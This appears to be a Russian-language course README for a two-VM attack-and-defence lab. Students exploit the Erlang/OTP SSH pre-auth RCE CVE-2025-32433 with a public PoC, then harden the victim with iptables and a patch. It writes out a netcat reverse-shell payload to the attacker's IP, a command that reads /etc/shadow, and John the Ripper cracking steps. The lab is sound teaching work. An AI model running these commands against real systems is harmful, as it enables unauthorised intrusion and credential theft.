
Этот проект имитирует реальный сценарий атаки и защиты на двух виртуальных машинах. Вы будете эксплуатировать критическую уязвимость удалённого выполнения кода до аутентификации (CVE-2025-32433) в SSH-сервере Erlang/OTP, взламывать извлечённые хеши паролей, а затем усиливать защиту атакованной машины с помощью правил брандмауэра и установки исправлений.
Всего баллов: 20 | Крайний срок: Опоздания не принимаются
Этот проект моделирует реальный сценарий атаки и защиты на двух виртуальных машинах. Вы будете эксплуатировать критическую уязвимость RCE до аутентификации (CVE-2025-32433) в SSH-сервере Erlang/OTP, взламывать извлечённые хеши паролей, а затем укреплять машину-жертву с помощью правил брандмауэра и исправлений.
| Роль | ОС |
|---|---|
| Атакующий | Kali Linux |
| Жертва | Ubuntu/Debian (Erlang/OTP SSH v27.3.2) |
| Файл | Описание |
|---|---|
Debian-1.ova | Предварительно созданный образ VM жертвы — скачайте отдельно, см. Ресурсы (слишком большой для GitHub) |
Debian-1.ova): Ссылка для скачивания — слишком большой (~3ГБ) для размещения на GitHub. Скачайте отдельно и импортируйте в VirtualBox/VMware, как описано ниже.rockyou_txt.txt): включён в этот репозиторий, используется для шага взлома пароля в Части 2.Debian-1.ova и вашу VM Kali Linux в VirtualBox/VMware.ifconfig, чтобы узнать её IP (обычно в 192.168.56.0/24).nmap -p 2222 -sV -A <victim-IP>
Документируйте открытые порты, версии служб и сигнатуры Erlang.
Временно переключите Kali на NAT, чтобы клонировать репозиторий, затем вернитесь обратно на "Только хост".
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py
Отредактируйте скрипт — установите HOST = "<victim-IP>" и обновите payload:
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'
Терминал 1 (Kali) — запустите слушатель:
nc -lvnp 4444
Терминал 2 (Kali) — запустите эксплойт:
python3 CVE-2025-32433.py
В обратной оболочке выполните whoami и hostname, чтобы подтвердить доступ.
# On victim (via reverse shell)
cat /etc/shadow | grep testuser > hash.txt
# On Kali
john --wordlist=rockyou_txt.txt hash.txt
Документируйте формат хеша (например, $6$ = SHA-512), затраченное время и восстановленный пароль в открытом виде.
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP
Повторно запустите сканирование Nmap и эксплойт с Kali — задокументируйте, что порт 2222 теперь "Отфильтрован" (Filtered) и эксплойт не работает.
Опишите шаги по обновлению Erlang/OTP до v27.3.3 или новее, которое содержит исправление для CVE-2025-32433.
whoami/hostname), захвата флагаCVE-2025-32433 — Критическая удалённая выполнение кода до аутентификации на SSH-сервере Erlang/OTP. Эксплуатируется отправкой повреждённых SSH-пакетов до любого обмена учётными данными, предоставляя неаутентифицированному атакующему полный доступ к оболочке.
Project Spring 2026 - Google Docs.pdf | Полные инструкции проекта с результатами |
rockyou_txt.txt | Список слов, используемый с John the Ripper для взлома извлечённого хеша пароля |